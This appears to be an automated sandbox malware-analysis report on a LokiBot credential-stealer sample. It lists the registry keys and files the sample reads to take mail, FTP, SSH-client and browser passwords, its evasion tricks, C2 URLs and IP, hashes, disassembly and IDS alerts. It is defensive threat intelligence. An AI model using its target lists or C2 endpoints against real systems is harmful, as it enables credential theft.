                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe TID: 6672Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeThread delayed: delay time: 60000Jump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected LokibotShow sources
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
                        Tries to steal Mail credentials (via file / registry access)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                        Tries to harvest and steal ftp login credentialsShow sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                        Tries to steal Mail credentials (via file registry)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: PopPassword0_2_0040D069
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: SmtpPassword0_2_0040D069
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery2Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion21Credentials in Registry2Virtualization/Sandbox Evasion21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        rfxJzZjiWv.exe88%VirustotalBrowse
                        rfxJzZjiWv.exe88%MetadefenderBrowse
                        rfxJzZjiWv.exe96%ReversingLabsWin32.Trojan.LokiBot
                        rfxJzZjiWv.exe100%AviraTR/Crypt.XPACK.Gen
                        rfxJzZjiWv.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.0.rfxJzZjiWv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.rfxJzZjiWv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        naourl.com6%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://naourl.com/data/five/fre.php11%VirustotalBrowse
                        http://naourl.com/data/five/fre.php0%Avira URL Cloudsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://survey-smiles.com5%VirustotalBrowse
                        http://survey-smiles.com0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        naourl.com
                        212.32.237.90
                        truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://naourl.com/data/five/fre.phptrue
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.ibsensoftware.com/rfxJzZjiWv.exefalse
                        • URL Reputation: safe
                        unknown
                        http://survey-smiles.comrfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmpfalse
                        • 5%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        212.32.237.90
                        naourl.comNetherlands
                        60781LEASEWEB-NL-AMS-01NetherlandsNLtrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:534005
                        Start date:04.12.2021
                        Start time:23:39:35
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 2m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:rfxJzZjiWv.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/2@5/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.9%)
                        • Quality average: 77%
                        • Quality standard deviation: 28.6%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.82.209.183
                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com, arc.trafficmanager.net, arc.msn.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        23:40:27API Interceptor3x Sleep call for process: rfxJzZjiWv.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        212.32.237.90PVCbiDUqly50DqS.exeGet hashmaliciousBrowse
                        • www.lendisty.com/n3kw/?XBZ4Xz=3e7Yc+NXVXGadH5y5BNj3Y3Se2h8oiNm35D3uKayWhE9KadvN5yxkmKGsLBu645DSWG9&5jJtSj=uXStFZp8ar
                        Fatura - Ex#35175382.pdf.exeGet hashmaliciousBrowse
                        • www.mwal.art/mabs/?jX8=3fQLnD&s0=y5mht5ETURUFzQSCIUXjodTlI+2TrsvqVBKlsua0zkPwCIYtRvvnPuF29Yxp6gBGwBsBQjQVNQ==
                        1lHMXoDyPa.exeGet hashmaliciousBrowse
                        • www.thetravellingwitch.com/wufn/?jrDHJt=SkZZDimXYK2GAldHwXdupEC24fazy/RNnOtrI6tDOvPCvzBdUVr3zvvTsRlAE2ql+mXxxlQZWg==&fR-=_JE8XJdXJfIL8n7
                        UJ8y5QToVc.exeGet hashmaliciousBrowse
                        • www.stearmanestates.com/ixwn/?W6AlL=PkY2LXPJp6HaPUrgGBEF3fMC5B3U3PtoZvpjUGm/uozF9Gfrzlf5sS41ov77FP8zbsbQ&-ZS8=9rJ0dRNxBdO0ALQp
                        OoBepaLH3W.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?brMXBhD=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&axl4i=0d9HO65X_T8H0F
                        bin.exeGet hashmaliciousBrowse
                        • www.futeboplayhd.com/cvrn/?9rSx00op=cI6gjmZKBv9uYsypK0vTgXjIez8bgYte2jg17UPI8uiUbtEGnMVqV/X2US4uhWYMbwpwMQFc9A==&StT=FR-8dxEhSB
                        F63V4i8eZU.exeGet hashmaliciousBrowse
                        • www.tearor.com/nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o
                        invoice.exeGet hashmaliciousBrowse
                        • www.bradforrexchange.com/3edq/?l6L0N=jO6sWaazfWUScqk/UMZ2V9vSXHj7s0GXSNY0VsmNmZeYB4f0QdniyMTma+6l76TklIvb&0BIX=M8Fp-rt
                        IsIMH5zplo.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?n2MLF0Ux=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&Dj6t=CpStsPY
                        USU(1).exeGet hashmaliciousBrowse
                        • www.bravefctv.com/zrmt/?P0G=EjUHInR&9r7T-=qIu/umqcIRyioTP+pvG+OWyvgre6YRhQlm6oiia3xqVFZWqPiKKv9qZBiAyUvYT1LHAt
                        bin.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?qFQl7Pf8=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9NNPWpGBee/B&uN9hQ=ejlP_vuP4dl4N6
                        Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                        • www.logittechg.com/sdh/?1b8Hsf=77GdCQf+cwNQcKtc4oP1L/izBQDHSDhpXIme07zuD8PhYeFl9nbDWdZJRwCLRhIFBccKSxqqHg==&j2MHoV=aDKhQD6PL
                        SWIFT MT103_Pdf.exeGet hashmaliciousBrowse
                        • www.laytikes.com/dll/?IR-4gF=rElkgYOcKLyb2ER2+Vlm0C8Ey2iKs9RZbxxxg2Tq9pxKpXGj+SPpWyY1djYg2iNp+BFv&Cj=lN9DoTMPZhdP
                        NWvnpLrdx4.exeGet hashmaliciousBrowse
                        • www.tishomingoinn.net/da0a/?D6Ap=ZfoTzbtx3ht&0pn=Rkrz4t3Ha8KNN1GxvDSxFj/JaPfAsCp6BjG/Fo7u/30cJxHSnd0meOFBOn5zZDOPw9ZFI5pbIw==
                        Statement for T10495.jarGet hashmaliciousBrowse
                        • www.mitbss.com/bnuw/?BZ=G4og8SmNJcmToC/1vURkjn6Fi/ymhkVmkW/Vhx9xfHxVp69hNmL93pjEBnq/aUUp6pz0&I48=4hOt163

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        LEASEWEB-NL-AMS-01NetherlandsNLGenoSec.armGet hashmaliciousBrowse
                        • 31.186.168.35
                        jKira.x86Get hashmaliciousBrowse
                        • 85.17.204.186
                        sys.exeGet hashmaliciousBrowse
                        • 93.190.222.52
                        Linux_x86Get hashmaliciousBrowse
                        • 213.227.132.36
                        rIiLBFxqPWGet hashmaliciousBrowse
                        • 46.182.122.55
                        YBni6CEBNMGet hashmaliciousBrowse
                        • 31.186.168.29
                        2018_11Informationen_betreffend_Transaktion.docGet hashmaliciousBrowse
                        • 95.211.144.68
                        Z4joY8Uhri.exeGet hashmaliciousBrowse
                        • 5.79.68.108
                        Se adjunta la factura proforma..exeGet hashmaliciousBrowse
                        • 212.32.237.91
                        MBFlKf1tsnGet hashmaliciousBrowse
                        • 83.149.87.180
                        YwZpT3p5Rh.msiGet hashmaliciousBrowse
                        • 95.211.136.23
                        uSY5H9rWjcGet hashmaliciousBrowse
                        • 83.149.87.180
                        DkTfOvsiCRGet hashmaliciousBrowse
                        • 45.130.62.155
                        Gs4CPvVFehGet hashmaliciousBrowse
                        • 83.149.87.180
                        Zp8WueaaAzGet hashmaliciousBrowse
                        • 83.149.87.180
                        XEhV64HdYTGet hashmaliciousBrowse
                        • 83.149.87.180
                        O86VH1rksjGet hashmaliciousBrowse
                        • 83.149.87.180
                        h6FAN1b2EWGet hashmaliciousBrowse
                        • 83.149.87.180
                        U6Qlvhqbs0Get hashmaliciousBrowse
                        • 83.149.87.180
                        bLn8EPVC21Get hashmaliciousBrowse
                        • 83.149.87.180

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: 1
                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: ........................................user.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.05714066527445
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:rfxJzZjiWv.exe
                        File size:106496
                        MD5:8ed7e6b478cf0c00934bb42e3bdf5e20
                        SHA1:ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
                        SHA256:4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
                        SHA512:db4f78f56df60bcc906588546d0bb55b7ff9ec483484a6d70f891bb33fc84339cf1ee77973f785f1f71d6b1eb8090449078bdc8ededb70a41c094cfa0b5affee
                        SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqdIzmd:nSHIG6mQwGmfOQd8YhY0/EgUG
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4139de
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:0239fd611af3d0e9b0c46c5837c80e09

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        push ecx
                        and dword ptr [ebp-04h], 00000000h
                        lea eax, dword ptr [ebp-04h]
                        push esi
                        push edi
                        push eax
                        call 00007F8788837F79h
                        push eax
                        call 00007F8788837F56h
                        xor esi, esi
                        mov edi, eax
                        pop ecx
                        pop ecx
                        cmp dword ptr [ebp-04h], esi
                        jle 00007F8788838136h
                        push 004188BCh
                        push dword ptr [edi+esi*4]
                        call 00007F878882A605h
                        pop ecx
                        pop ecx
                        test eax, eax
                        je 00007F878883811Dh
                        push 00002710h
                        call 00007F878882AEBAh
                        pop ecx
                        inc esi
                        cmp esi, dword ptr [ebp-04h]
                        jl 00007F87888380EEh
                        push 00000000h
                        call 00007F8788837F4Eh
                        push 00000000h
                        call 00007F8788838262h
                        pop ecx
                        pop edi
                        xor eax, eax
                        pop esi
                        mov esp, ebp
                        pop ebp
                        retn 0010h
                        push ebp
                        mov ebp, esp
                        xor eax, eax
                        push eax
                        push eax
                        push E567384Dh
                        push eax
                        call 00007F87888278A9h
                        push dword ptr [ebp+08h]
                        call eax
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, dword ptr [ebp+08h]
                        test esi, esi
                        je 00007F8788838174h
                        push esi
                        call 00007F878882A3D0h
                        pop ecx
                        test eax, eax
                        je 00007F8788838169h
                        push esi
                        call 00007F878882840Ch
                        pop ecx
                        test eax, eax
                        je 00007F878883815Eh
                        mov eax, dword ptr [0049FDECh]
                        cmp dword ptr [ebp+10h], 00000000h
                        cmovne eax, dword ptr [ebp+10h]
                        push eax
                        push dword ptr [0049FDE8h]
                        call 00007F8788829E04h
                        push dword ptr [ebp+0Ch]
                        push dword ptr [0049FDE8h]
                        call 00007F8788829DF6h
                        push 00000000h
                        push 00000000h
                        push esi

                        Rich Headers

                        Programming Language:
                        • [ASM] VS2008 SP1 build 30729
                        • [ASM] VS2003 (.NET) build 3077
                        • [ C ] VS2008 SP1 build 30729
                        • [LNK] VS2013 UPD5 build 40629
                        • [C++] VS2013 UPD5 build 40629
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x136f50x13800False0.568509615385data6.49204829439IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x150000x40600x4200False0.370087594697data4.26890991196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x1a0000x85e240x200False0.12890625data0.946496689201IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .x0xa00000x20000x2000False0.0181884765625data0.198253121373IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                        KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                        ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                        OLEAUT32.dllVariantInit, SysFreeString, SysAllocString

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        12/04/21-23:40:25.169299TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24975280192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976580192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.4212.32.237.90

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 4, 2021 23:40:25.141088009 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.166338921 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.166424036 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.169298887 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.195113897 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.195162058 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.220299959 CET8049752212.32.237.90192.168.2.4
